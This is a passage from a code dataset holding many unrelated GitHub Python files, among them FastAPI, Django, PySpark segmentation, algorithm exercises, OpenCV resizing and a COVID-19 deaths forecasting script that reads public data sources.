print_line():\n    for i in range(105):\n        print(\"_\", end='')\n    print()\n\n\ndef main():\n    cr = 4 / 5\n    pl = 10\n    print_line()\n    # bandwidths in the header match the loop below: 125, 250 and 500 kHz\n    print(\"\\t\\t\\t\\t125kHz\\t\\t\\t\\t\\t|\\t\\t\\t250kHz\\t\\t\\t\\t|\\t\\t\\t500kHz\")\n    print_line()\n    print(\"\\t Bitrate\\t\\tSensitivity\\tToA \\tBitrate\\t\\tSensitivity\\tToA\\t\\tBitrate\\t\\tSensitivity\\tToA\")\n    for sf in [7, 8, 9, 10, 11, 12]:\n        print(\"SF = \" + str(sf) + \": \", end='')\n        for bw in [125, 250, 500]:  # bw in kHz\n            print(str(calculate_bitrate(bw, sf, cr)) + \"\\t\\t\" + str(calculate_sensitivity(bw, sf)) + \"\\t\\t\" + str(\n                calculate_toa(bw, sf, cr, pl)) + \"\\t|\", end='')\n        print()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"MohamadCM/IoT-Practice","sub_path":"3/Source_code/lora_specification.py","file_name":"lora_specification.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73129233212","text":"from fastapi import Depends, FastAPI\nfrom sqlalchemy.orm import Session\n\nimport crud\nfrom database import SessionLocal\nfrom schemas import DriverResponse, DriverFilter\n\napp = FastAPI()\n\n\ndef get_db():\n    db = SessionLocal()\n    try:\n        yield db\n    finally:\n        db.close()\n\n\n@app.get(\"/drivers/\", response_model=DriverResponse)\ndef get_users(\n    driver: DriverFilter,\n    db: Session = Depends(get_db)\n):\n    drivers = []\n    try:\n        drivers = crud.get_drivers(db, driver)\n        response_dict = {\"code\": \"0\", \"msg\": \"success\", \"records\": drivers}\n    except Exception:\n        response_dict = {\"code\": \"-1\", \"msg\": \"failure\", \"records\": drivers}\n    return DriverResponse(**response_dict)\n","repo_name":"lerime/driver-api-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14737425288","text":"\"\"\"\nSubtree query operations for Tree() objects.\n\"\"\"\n\nimport array\nfrom typing import List, Dict, Any\n\nclass SubtreeQuery():\n\n    def get_subtree_size(self, node: int) -> int:\n        \"\"\"\n        Returns the number of nodes in the subtree rooted at the given node.\n        \"\"\"\n        self._check_node_number(node)\n        return self.subtree_sizes[node]\n\n    def get_treedata_coord(self, node: int) -> int:\n        \"\"\"\n        Returns the position of the given node in the treedata array.\n        \"\"\"\n        self._check_node_number(node)\n        return self.coords[node]\n\n    def get_subtree_data(self, subtree_root: int) -> array.array:\n        \"\"\"\n        Returns the treedata array for the subtree rooted at the given node.\n\n        This includes nodes marked as deleted.\n        \"\"\"\n        self._check_node_number(subtree_root)\n        pos = self.get_treedata_coord(subtree_root)\n        if pos > 0:\n            subtree_size = self.get_subtree_size(subtree_root)\n            return self.treedata[pos:pos + subtree_size]\n        else:\n            return array.array(\"Q\")\n\n    def subtree_ids(self, subtree_root: int) -> array.array:\n        \"\"\"\n        Returns the IDs of the nodes in the subtree rooted at the given node.\n        \"\"\"\n        self._check_node_number(subtree_root)\n        result = array.array(\"Q\")\n        for node_id in self.get_subtree_data(subtree_root):\n            if node_id != self.UNDEF:\n                result.append(node_id)\n        return result\n\n    def subtree_info(self, subtree_root: int, attributes: List[str] = [],\n                     include_subtree_sizes: bool = False,\n                     include_parents: bool = False,\n                     show_stats: bool = False,\n                     node_id_key = \"node_id\",\n                     subtree_size_key = \"subtree_size\",\n                     parent_key = \"parent\") -> Dict[str, 
List[Any]]:\n        result = {}\n        node_ids = self.get_subtree_data(subtree_root)\n        result[node_id_key] = node_ids\n        if include_subtree_sizes:\n            result[subtree_size_key] = []\n            for node_id in node_ids:\n                if node_id != self.UNDEF:\n                    result[subtree_size_key].append(self.get_subtree_size(node_id))\n                else:\n                    result[subtree_size_key].append(None)\n        if include_parents:\n            result[parent_key] = []\n            for node_id in node_ids:\n                if node_id != self.UNDEF:\n                    result[parent_key].append(self.get_parent(node_id))\n                else:\n                    result[parent_key].append(None)\n        if attributes:\n            attr_values = self.query_attributes(subtree_root, attributes, show_stats)\n            for attrname in attributes:\n                result[attrname] = attr_values[attrname]\n        return result\n\n","repo_name":"ggonnella/fastsubtrees","sub_path":"fastsubtrees/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"3651389222","text":"from scipy.spatial.distance import cdist\nimport numpy as np\nimport sys\n\n# X = np.zeros((10,3))\n# X[:,0]=np.arange(1,11)\n# print(X)\n# c = cdist(X, X, 'euclidean')\n# print(c)\n# l = int(X.shape[0]/2)\n# print(l)\n# print(X[:l], X[l:])\n# c00=cdist(X[:l], X[:l], 'euclidean')\n# c01=cdist(X[:l], X[l:], 'euclidean')\n# c11=cdist(X[l:], X[l:], 'euclidean')\n# c2=np.block([[c00,c01], [c01.T,c11]])\n# print(c00,c01,c11,c2)\n\n\ndef rec_cdist(X, Y, metric=\"euclidean\"):\n    try:\n        c = cdist(X, Y, metric=metric)\n    except ValueError:\n        print(\"The shape of the matrix is too big to be calculated by cdist directly,\\\n            subdivision of the matrix initiated. It might take a moment\")\n        l = int(X.shape[0]/2)\n        print(\"########\", l, \"\\n\")\n        c00 = rec_cdist(X[:l], Y[:l], metric=metric)\n        c01 = rec_cdist(X[:l], Y[l:], metric=metric)\n        c11 = rec_cdist(X[l:], Y[l:], metric=metric)\n        # the lower-left block is the transpose of the upper-right block,\n        # since the distance matrix of X against itself is symmetric\n        c = np.block([[c00, c01], [c01.T, c11]])\n    return c\n\n\n\nif __name__ == \"__main__\":\n    # len = 100000\n    # X = np.zeros((len,3), dtype=np.float64)\n    # X[:,0]=np.arange(0,len)\n    # X.astype(\"float32\")\n    # print(rec_cdist(X,X))\n    print(np.intp)\n    print(sys.maxsize > 2**32)\n    print(sys.executable)\n","repo_name":"olaurendin/Kriging","sub_path":"tests/test_cdist.py","file_name":"test_cdist.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2265813194","text":"# Baekjoon 9252: LCS 2\n\nS1 = input()\nS2 = input()\n\n# two 2-D dp tables: dp holds LCS lengths, dp2 holds the LCS strings themselves\ndp = [[0] * (len(S1)+1) for _ in range(len(S2)+1)]\ndp2 = [[''] * (len(S1)+1) for _ in range(len(S2)+1)]\n\nif S1[0] == S2[0]:\n    dp[1][1] = 1\n    dp2[1][1] = S1[0]\n\nfor i in range(1,len(S2)+1):\n    for j in range(1,len(S1)+1):\n\n        if S2[i-1] == S1[j-1]:\n            dp[i][j] = dp[i-1][j-1] + 1\n            dp2[i][j] = dp2[i-1][j-1] + S2[i-1]\n        # otherwise take the larger of the value from the previous row\n        # and the previous column as the current dp value\n        else:\n            dp[i][j] = max(dp[i-1][j], dp[i][j-1])\n            # carry over the corresponding LCS string as well\n            if dp[i][j] == dp[i-1][j]:\n                dp2[i][j] = dp2[i-1][j]\n            else:\n                dp2[i][j] = dp2[i][j-1]\nprint(dp[-1][-1])\nprint(dp2[-1][-1])\n","repo_name":"jihun-24k/Algorithm","sub_path":"Baek_joon/LCS2.py","file_name":"LCS2.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"237467115","text":"import svgwrite\nimport math\n\niterations = 18\nangle = 5\nangle_rad = math.radians(angle)\nscale = 1 / 
(math.sin(angle_rad) + math.cos(angle_rad))\n\ndwg = svgwrite.Drawing(\"images/test.svg\", profile=\"full\")\n\nfor i in range(iterations):\n    rect = dwg.rect((-50, -50), (100, 100), stroke=\"black\")\n    rect.fill(\"blue\", opacity=0)\n    rect.rotate(angle * i)\n    # rect.scale(math.pow(scale,i))\n    dwg.add(rect)\n\ndwg.save()\n","repo_name":"shymmetry/geo-svg","sub_path":"make-svg.py","file_name":"make-svg.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3168391582","text":"from rest_framework import serializers\n\nfrom data_import.models import DataFile\nfrom data_import.serializers import DataFileSerializer\n\nfrom .models import DataRequestProject, DataRequestProjectMember\n\n\nclass ProjectDataSerializer(serializers.ModelSerializer):\n    \"\"\"\n    Serialize data for a project.\n    \"\"\"\n\n    class Meta:  # noqa: D101\n        model = DataRequestProject\n\n\nclass ProjectMemberDataSerializer(serializers.ModelSerializer):\n    \"\"\"\n    Serialize data for a project member.\n    \"\"\"\n\n    class Meta:  # noqa: D101\n        model = DataRequestProjectMember\n\n        fields = [\n            'created',\n            'project_member_id',\n            'message_permission',\n            'sources_shared',\n            'username',\n            'data',\n        ]\n\n    username = serializers.SerializerMethodField()\n    data = serializers.SerializerMethodField()\n\n    @staticmethod\n    def get_username(obj):\n        \"\"\"\n        Only return the username if the user has shared it with the project.\n        \"\"\"\n        if obj.username_shared:\n            return obj.member.user.username\n\n        return None\n\n    @staticmethod\n    def get_data(obj):\n        \"\"\"\n        Return current data files for each source the user has shared with\n        the project, including the project itself.\n        \"\"\"\n        files = DataFile.objects.filter(\n            user=obj.member.user,\n            source__in=obj.sources_shared_including_self).exclude(\n            parent_project_data_file__completed=False).current()\n\n        return [DataFileSerializer(data_file).data for data_file in files]\n\n    def to_representation(self, obj):\n        rep = super(ProjectMemberDataSerializer, self).to_representation(obj)\n\n        if not rep['username']:\n            rep.pop('username')\n\n        return rep\n","repo_name":"gitter-badger/open-humans","sub_path":"private_sharing/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"34095749292","text":"from django.contrib import admin\nfrom django import forms\n\n\nfrom .models import Company, State, Country, District\n\n# Register your models here.\n\n\nclass CompanyAdminForm(forms.ModelForm):\n\n    state = forms.ModelChoiceField(label='地市', queryset=State.objects.none())\n    # the empty initial queryset must come from District, not State\n    district = forms.ModelChoiceField(label='区域', queryset=District.objects.none())\n\n    def __init__(self, *args, **kwargs):\n        ins = kwargs.get('instance')\n        super(CompanyAdminForm, self).__init__(*args, **kwargs)\n\n        if ins and ins.country:\n            self.fields['state'].queryset = State.objects.filter(country=ins.country)\n        if ins and ins.district:\n            self.fields['district'].queryset = District.objects.filter(state=ins.state)\n\n        if 'state' in self.data and self.data['country']:\n            self.fields['state'].queryset = State.objects.filter(country=self.data['country'])\n        if 'district' in self.data and self.data['state']:\n            self.fields['district'].queryset = District.objects.filter(state=self.data['state'])\n\n    class Meta:\n        model = Company\n        fields = '__all__'\n        #exclude=['state']\n\n\nclass CompanyAdmin(admin.ModelAdmin):\n    form = 
CompanyAdminForm\n\n\nadmin.site.register(Company, CompanyAdmin)\nadmin.site.register(Country)\nadmin.site.register(State)\nadmin.site.register(District)\n","repo_name":"nodeweb/examples","sub_path":"djangoApp/company/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40905379446","text":"\nfrom pyspark.sql import functions as f\nfrom pyspark.sql import Window\n\nimport products_embedding.src.pull_input_data as ingress\n\n\n########################\n# PURPOSE\n########################\n##\n# This file assumes it is passed the correct households that need to be HML'd.\n# It generates the spend and unit penetration pillars and assigns weights accordingly\n##\n\ndef pull_hml_kpis(active_modality_kpis, preassigned_hml_hhs_df, quarters_df):\n    \"\"\"\n    This function calculates quarter level spend and unit KPIs from provided Vintages DF.\n\n    Inputs:\n    1) active_modality_kpis - spark DF of vintage KPIs for desired modality\n    2) preassigned_hml_hhs_df - spark DF of households that deserve an HML\n    3) quarters_df - spark DF that maps fiscal_week to quarter\n\n    Output:\n    active_hml_kpis - spark DF that aggregates modality spend and units at ehhn-quarter level\n    \"\"\"\n\n    active_hml_kpis = (active_modality_kpis\n                       # filter to HML households\n                       .join(preassigned_hml_hhs_df.select('ehhn'), ['ehhn'], 'inner')\n                       .join(quarters_df, 'fiscal_week', 'inner')\n\n                       # use these to generate quartiles\n                       .groupBy('ehhn', 'quarter')\n                       .agg(f.sum('weekly_sales').alias('sales'),\n                            f.sum('weekly_units').alias('units')\n                            )\n                       )\n\n    return active_hml_kpis\n\n\ndef pull_ent_quarterly_behavior(acds, start_week, end_week, quarters_df):\n    \"\"\"\n    This function pulls enterprise visits so we can calculate modality visit penetration\n\n    Inputs:\n    1) acds - ACDS object, input to `pull_vintages_df`\n    2) start_week - first fiscal_week to pull (oldest)\n    3) end_week - last fiscal_week to pull (most recent)\n    4) quarters_df - spark DF that maps fiscal_week to quarter\n\n    Output:\n    active_ent_quarterly_behavior - spark DF that aggregates modality visits at ehhn-quarter level\n    \"\"\"\n\n    active_ent_quarterly_behavior = (ingress.pull_vintages_df(acds, 'enterprise', start_week, end_week, 'sales')\n                                     .select('ehhn', 'fiscal_week', 'weekly_units')\n                                     .join(quarters_df, 'fiscal_week', 'inner')\n                                     .groupBy('ehhn', 'quarter')\n                                     .agg(f.sum('weekly_units').alias('enterprise_units'))\n                                     )\n\n    return active_ent_quarterly_behavior\n\n\ndef combine_pillars(active_hml_kpis, active_ent_quarterly_behavior):\n    \"\"\"\n    This function combines enterprise quarter visits with modality quarter aggregations.\n    Produces modality visit penetration pillar necessary for weighting\n\n    Inputs:\n    1) active_hml_kpis - spark DF, output of `pull_hml_kpis`\n    2) active_ent_quarterly_behavior - spark DF, output of `pull_ent_quarterly_behavior`\n\n    Output:\n    pillars_df - spark DF, contains all information needed to weight households on pillars\n    \"\"\"\n\n    pillars_df = (active_hml_kpis\n                  .join(active_ent_quarterly_behavior, ['ehhn', 'quarter'], 'inner')\n                  .withColumn('unit_penetration',\n                              f.round(f.col('units') / f.col('enterprise_units'), 4)\n                              )\n                  )\n\n    return pillars_df\n\n\ndef create_weighted_df(pillars_df, qtr_weights_df, spend_thresholds=(.5, .9), visit_thresholds=(.5, .9)):\n    \"\"\"\n    This function assigns weights at a quarter level based on provided cutoffs and calculated 
percentiles.\n    Then it assigns initial HML groups at a quarter level, and uses them to assign quarter points.\n    Last, it weights quarter points by quarter recency weights\n\n    Inputs:\n    1) pillars_df - spark DF, output from `combine_pillars`\n    2) qtr_weights_df - spark DF, maps quarter number to its weight. output from `utils.create_quarter_weights_df`\n    3) spend_thresholds - these can be custom specified as a tuple, but have sensible defaults\n    4) visit_thresholds - these can be custom specified as a tuple, but have sensible defaults\n\n    Output:\n    weighted_df - spark DF, quarter-level points weighted by quarter recency\n    \"\"\"\n    high_spend_cutoff = spend_thresholds[1]\n    medium_spend_cutoff = spend_thresholds[0]\n\n    high_visits_cutoff = visit_thresholds[1]\n    medium_visits_cutoff = visit_thresholds[0]\n\n    spend_window = Window.partitionBy('quarter').orderBy('sales')\n    penetration_window = Window.partitionBy('quarter').orderBy('unit_penetration')\n\n    weighted_df = (pillars_df\n                   .withColumn('spend_percentile', f.percent_rank().over(spend_window))\n                   .withColumn('penetration_percentile',\n                               f.when(f.col('unit_penetration') == 1, 1)\n                               .otherwise(f.percent_rank().over(penetration_window))\n                               )\n\n                   .withColumn('spend_rank',\n                               f.when(f.col('spend_percentile') >= high_spend_cutoff, 'H')\n                               .when(f.col('spend_percentile') >= medium_spend_cutoff, 'M')\n                               .otherwise('L')\n                               )\n                   .withColumn('penetration_rank',\n                               f.when(f.col('penetration_percentile') >= high_visits_cutoff, 'H')\n                               .when(f.col('penetration_percentile') >= medium_visits_cutoff, 'M')\n                               .otherwise('L')\n                               )\n\n                   .withColumn('quarter_points',\n\n                               # these 3 cover new markets\n                               f.when((f.col('spend_rank') == 'H') & (f.col('new_market_div') == 'new market'), 3)\n                               .when((f.col('spend_rank') == 'M') & (f.col('new_market_div') == 'new market'), 2)\n                               .when((f.col('spend_rank') == 'L') & (f.col('new_market_div') == 'new market'), 1)\n\n                               # these cover all existing markets which have BOTH pillars evaluated\n                               .when((f.col('spend_rank') == 'H') & (f.col('penetration_rank') == 'H'), 3)\n                               .when((f.col('spend_rank') == 'M') & (f.col('penetration_rank') == 'H'), 3)\n                               .when((f.col('spend_rank') == 'H') & (f.col('penetration_rank') == 'M'), 3)\n\n                               .when((f.col('spend_rank') == 'M') & (f.col('penetration_rank') == 'M'), 2)\n                               .when((f.col('spend_rank') == 'L') & (f.col('penetration_rank') == 'H'), 2)\n                               .when((f.col('spend_rank') == 'H') & (f.col('penetration_rank') == 'L'), 2)\n\n                               .when((f.col('spend_rank') == 'L') & (f.col('penetration_rank') == 'L'), 1)\n                               .when((f.col('spend_rank') == 'M') & (f.col('penetration_rank') == 'L'), 1)\n                               .when((f.col('spend_rank') == 'L') & (f.col('penetration_rank') == 'M'), 1)\n                               .otherwise(0)\n                               )\n\n                   .join(qtr_weights_df, 'quarter', 'left')\n\n                   .withColumn('recency_adjusted_quarter_points',\n                               f.round(f.col('quarter_points') * f.col('weight'), 4)\n                               )\n                   )\n\n    return weighted_df\n\n\ndef create_weighted_segs(weighted_df):\n    \"\"\"\n    This function is the final step in the HMLs process. It takes the output from `create_weighted_df` and\n    sums the scores to get the final HML points for each household. 
This is used to then assign final\n H/M/L scores.\n\n Input:\n 1) weighted_df - spark DF, output from `create_weighted_df`\n\n Output:\n weighted_segs - spark DF, has HMLs assigned to each household\n \"\"\"\n weighted_segs = (weighted_df\n .groupBy('ehhn')\n .agg(f.sum('recency_adjusted_quarter_points').alias('weighted_points'))\n .withColumn('segment',\n f.when(f.col('weighted_points') > 2, 'H')\n .when(f.col('weighted_points') > 1, 'M')\n .when(f.col('weighted_points') <= 1, 'L')\n .otherwise('ERROR')\n )\n # selects these two columns to match other DFs for easy union\n .select('ehhn', 'segment')\n )\n\n return weighted_segs\n","repo_name":"christianrodriguez-8451/non_endemic_segmentations","sub_path":"products_embedding/src/hmls.py","file_name":"hmls.py","file_ext":"py","file_size_in_byte":8563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44043501232","text":"from .base import Protocol\nfrom .layer2 import ARP, Ethernet\nfrom .layer3 import ICMP, IPv4, IPv6\nfrom .layer4 import TCP, UDP\n\nSUPPORTED_PROTOCOLS = frozenset(cls.__name__.lower() for cls in Protocol.__subclasses__())\n\n\ndef is_supported_protocol(proto_name: str) -> bool:\n return proto_name.lower() in SUPPORTED_PROTOCOLS\n\n\n__all__ = (\n \"Protocol\",\n \"ARP\",\n \"Ethernet\",\n \"ICMP\",\n \"IPv4\",\n \"IPv6\",\n \"TCP\",\n \"UDP\",\n \"SUPPORTED_PROTOCOLS\",\n \"is_supported_protocol\",\n)\n","repo_name":"koczanm/nipsu","sub_path":"src/nipsu/protocols/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8549992198","text":"import re\n\nimport pandas as pd\n\nfrom src.bullet_detector import BulletsDetector\n\n\nclass Validator(object):\n def __init__(self):\n self.bullet_identifier = BulletsDetector()\n\n def validate(self, dataframes):\n result = list()\n for dataframe in dataframes:\n result.append(self.validate_bullet_and_split(dataframe))\n return result\n\n def validate_bullet_and_split(self, dataframe):\n bullets_to_validate = ['Sub-heading']\n df = pd.DataFrame(columns=dataframe.columns)\n bullets_found = self.bullet_identifier.detect_tag_specific_bullets(bullets_to_validate, dataframe)\n identifier = bullets_found.get('Sub-heading')\n new_index = -1\n for index, row in dataframe.iterrows():\n if row['Tag'] == 'Sub-heading' and identifier.is_bullet_present(row['Text']):\n splitted_text = re.split(r'(?<=\\w\\.)\\s', row['Text'])\n sub_heading = splitted_text[0]\n para = splitted_text[1]\n new_index += 1\n df.loc[new_index] = [sub_heading, 'Sub-heading', row['Typography'], row['Top_left'],\n row['Bottom_right'], row['File_Name'], row['Page_style'], row['Page_Number'],\n row['Tag_no'], row['Document_type']]\n new_index += 1\n df.loc[new_index] = [para, 'para', row['Typography'], row['Top_left'],\n row['Bottom_right'], row['File_Name'], row['Page_style'], row['Page_Number'],\n row['Tag_no'], row['Document_type']]\n new_index += 1\n df.loc[new_index] = [row['Text'], row['Tag'], row['Typography'], row['Top_left'],\n row['Bottom_right'], row['File_Name'], row['Page_style'], row['Page_Number'],\n row['Tag_no'], row['Document_type']]\n return df\n","repo_name":"rishavroy1264bitmesra/sample_code","sub_path":"src/backlog.py","file_name":"backlog.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29919707281","text":"# 
Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def swapPairs(self, head: ListNode) -> ListNode:\n        # if not head or not head.next:\n        #     return head\n        # newh = head.next\n        # head.next = self.swapPairs(newh.next)\n        # newh.next = head\n        # return newh\n        if not head or not head.next:\n            return head\n        tmp = self.swapPairs(head.next.next)  # recurse on the rest of the list, swapping it pair by pair; the result is reattached via head.next\n        res = head.next\n        res.next = head\n        head.next = tmp\n        return res\n\n\n\"\"\"\nSwap adjacent nodes of a linked list\nApproach:\n(recursion)\n'''Let head denote the head node of the original list, which becomes the second node of the new list,\n   and newHead the head node of the new list, i.e. the second node of the original list; the remaining\n   nodes of the original list are headed by newHead.next.\n   Setting head.next = swapPairs(newHead.next) swaps the remaining nodes in pairs, and the head of the\n   swapped tail becomes the node after head.\n   Then newHead.next = head completes the swap of all nodes; finally return the new head newHead.\n   ![](https://pictures.ryanhor.com/20201013083930.png) '''\n1. Recursion base case: the node's next is empty, or only one element is left\n2. Return value: the sub-list whose swaps are already finished\n3. Since recursion repeats the same work, only a single step needs to be considered at the macro level.\n   Suppose the two nodes to swap are head and next; next should receive the sub-list returned from the\n   level above (see step 2). That reduces to swapping the first two nodes of a three-node list -- draw\n   a picture if it is hard to see.\n\"\"\"","repo_name":"ANh0r/LeetCode-Daily","sub_path":"10.13 swapPairs.py","file_name":"10.13 swapPairs.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"20386618899","text":"import cv2 as cv\r\ndef re_scalling(frame, scale=0.200):\r\n    # frame.shape is (height, width, channels)\r\n    height = int(frame.shape[0]*scale)\r\n    width = int(frame.shape[1]*scale)\r\n    # cv.resize expects the target size as (width, height)\r\n    dimensions = (width, height)\r\n    return cv.resize(frame, dimensions, interpolation=cv.INTER_AREA)\r\n\r\nt = cv.imread(\"pp.png\")\r\n# cv.imshow(\"org\", t)\r\n# a = re_scalling(t)\r\n\r\nb = cv.resize(t, (200, 200))\r\ncv.imshow(\"resized\", b)\r\ncv.waitKey(0)\r\n","repo_name":"Ssumeetdubas/Open_cv","sub_path":"rescalling.py","file_name":"rescalling.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36960653225","text":"\"\"\"\nRunning deaths forecasts\nthe same procedure is used as for cases\nthe main function with trend estimation and forecasting can be found in forecast_one_country.py\n\nto run in cmd on JHU or JHU_US:\npython source/run_deaths_from_cases.py --dataset=\"JHU\"\npython source/run_deaths_from_cases.py --dataset=\"JHU_US\"\n\n\"\"\"\n\nimport multiprocessing\nimport os\nimport time\nimport warnings\nfrom datetime import date\nimport getopt, sys\nimport numpy as np\nimport pandas as pd\n\nfrom covid19dh import covid19\nsys.path.append('methods_configuration/')\nfrom precomputing import read_countries, repair_increasing\nfrom smoothing import simple_mirroring, piecewise_STL\nfrom function_configuration import METHODS\nfrom visualization import plot_last_forecast\nfrom test_missing_or_zero import test_poisson\nfrom forecast_one_country import compute_confidence, forecast_one_country\n\nif not sys.warnoptions:\n    warnings.simplefilter(\"ignore\")\nif not os.path.exists(\"results/\"):\n    os.makedirs(\"results/\")\n\n# -------------------------------------------------------------------------------------------------------\n# Get full command-line arguments\n# -------------------------------------------------------------------------------------------------------\n\nfull_cmd_arguments = sys.argv\nshort_options = \"d:\"\nlong_options = [\"dataset=\"]\n# Keep all but the first\nargument_list = full_cmd_arguments[1:]\npath_data = 
\"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\ndatasource, parse_column = \"JHU\", \"Country/Region\"\n \n \ntry:\n arguments, values = getopt.getopt(argument_list, short_options, long_options)\n for current_argument, current_value in arguments:\n if current_argument in (\"-d\", \"--dataset\"): \n #in case of deaths to change the paths to death data\n if current_value == \"JHU_US\":\n path_data = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\"\n datasource, parse_column = \"JHU_US\", \"Province_State\"\n elif current_value == \"JHU\":\n path_data = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\n datasource, parse_column = \"JHU\", \"Country/Region\" \n elif current_value == 'OZH':\n path_data = \"https://raw.githubusercontent.com/openZH/covid_19/master/COVID19_Fallzahlen_CH_total_v2.csv\"\n datasource, parse_column = 'OZH', 'abbreviation_canton_and_fl'\n elif current_value == 'BAG':\n path_data = \"https://www.bag.admin.ch/dam/bag/fr/dokumente/mt/k-und-i/aktuelle-ausbrueche-pandemien/2019-nCoV/covid-19-datengrundlage-lagebericht.xlsx.download.xlsx/200325_base%20de%20donn%C3%A9es_graphiques_COVID-19-rapport.xlsx\"\n datasource, parse_column = 'BAG', 'country'\n elif current_value == 'BAG_KT':\n path_data = \"https://www.covid19.admin.ch/api/data/context\"\n datasource, parse_column = 'BAG_KT', 'geoRegion'\n elif current_value == 'CAN':\n path_data = \"https://api.opencovid.ca/timeseries?stat=mortality&loc=prov\"\n datasource, parse_column = 'CAN', 'province'\n elif current_value == 'HUB':\n path_data = None\n datasource, parse_column = 'HUB', 'id'\n elif current_value == 'PHE':\n path_data = 'https://api.coronavirus.data.gov.uk/v2/data?areaType=nation&metric=cumDeaths28DaysByDeathDate&metric=cumCasesBySpecimenDate&format=csv'\n datasource, parse_column = 'PHE', 'areaName'\n elif current_value == 'SPF_DEP':\n path_data = 'https://www.data.gouv.fr/en/datasets/r/5c4e1452-3850-4b59-b11c-3dd51d7fb8b5'\n datasource, parse_column = 'SPF_DEP', 'dep'\n elif current_value == 'SPF_REG':\n path_data = 'https://www.data.gouv.fr/en/datasets/r/5c4e1452-3850-4b59-b11c-3dd51d7fb8b5'\n datasource, parse_column = 'SPF_REG', 'reg'\n elif current_value == 'SPF_FRA':\n path_data = 'https://www.data.gouv.fr/fr/datasets/r/f335f9ea-86e3-4ffa-9684-93c009d5e617'\n datasource, parse_column = 'SPF_FRA', 'country'\n \nexcept getopt.error as err: \n # Output error, and return with an error code\n print(str(err))\n print(\"using JHU\") \n# -------------------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n #--------------------setup--------------------\n #default forecast is for H=7 days\n H = 7, \n #smoothing method\n smoothing_fun = piecewise_STL \n print(datasource) \n #-----------------reading the data------------\n if datasource == \"BAG\":\n df = pd.read_excel(path_data, sheet_name=0, skiprows=6)\n df = df.sort_values('Date').iloc[:-1] # exclude the last data point as it is only data before 8am\n df[parse_column] = 'Switzerland' # add country column\n elif datasource == 'BAG_KT':\n df = pd.read_csv(pd.read_json(path_data).loc['individual', 'sources']['csv']['daily']['death'])\n elif datasource == 'CAN':\n df = 
pd.DataFrame.from_records(pd.read_json(path_data).values.flatten())\n elif datasource == 'HUB':\n df, _ = covid19(level=1, raw=True, verbose=False)\n elif 'SPF' in datasource:\n df = pd.read_csv(path_data, dtype='str', encoding='latin')\n if 'FRA' in datasource:\n df[parse_column] = 'France'\n else:\n df[parse_column] = parse_column + df[parse_column]\n else:\n df = pd.read_csv(path_data)\n \n # ------------------------------------------------------------------------------------------------------- \n #loading the extrapolation method: 3 corresponds to linear extrapolation in original scale when trend \n #is increasing, and in log-scale when decreasing\n #--------------------------------------------------------------------------------------------------------\n subset = [3] \n methods_df_path = \"methods_configuration/selected_methods_const.csv\"\n methods_pd = pd.read_csv(methods_df_path) \n # Read the methods from methods.csv with references given in METHODS \n methods = [METHODS[x] for x in list(methods_pd[\"method\"].values[subset])]\n kwargs_list = [eval(x) for x in list(methods_pd[\"parameters\"].values[subset])]\n names = list(methods_pd[\"description\"].values[subset])\n cv_flag = list(methods_pd[\"cv\"].astype(int).values[subset])\n \n #-------------------------------countries----------------------------------------------------------------\n countries = list(set(df[parse_column])-set([\"Cases_on_an_international_conveyance_Japan\", \"Diamond_Princess\", \"Repatriated\"])) \n cumulative_list, date_list = read_countries(df, countries, 0, datasource, typedata = \"deaths\")\n # -------------------------------forecast deaths--------------------------------------------------------- \n for i in range(len(countries)):\n return_dict, _, ci_ = forecast_one_country({}, countries[i], cumulative_list[i], date_list[i], \n methods, kwargs_list, names, smoothing_fun, datasource, \n H=7, type_data=\"deaths\", missing_var=True, return_val = True, saveplot=False, newly=True) \n if i==0:\n deaths_predictions = return_dict[countries[i]][2].copy()\n ci = ci_.copy() \n else:\n deaths_predictions = deaths_predictions.append(return_dict[countries[i]][2]) \n ci = ci.append(ci_) \n print(countries[i], f\"{i+1}/{len(countries)} done\")\n #----------------------------------------save results----------------------------------------------------- \n deaths_predictions.to_csv(\"results/\"+ datasource +'_deaths_predictions_'+date.today().strftime(\"%Y_%m_%d\")+'.csv')\n \n 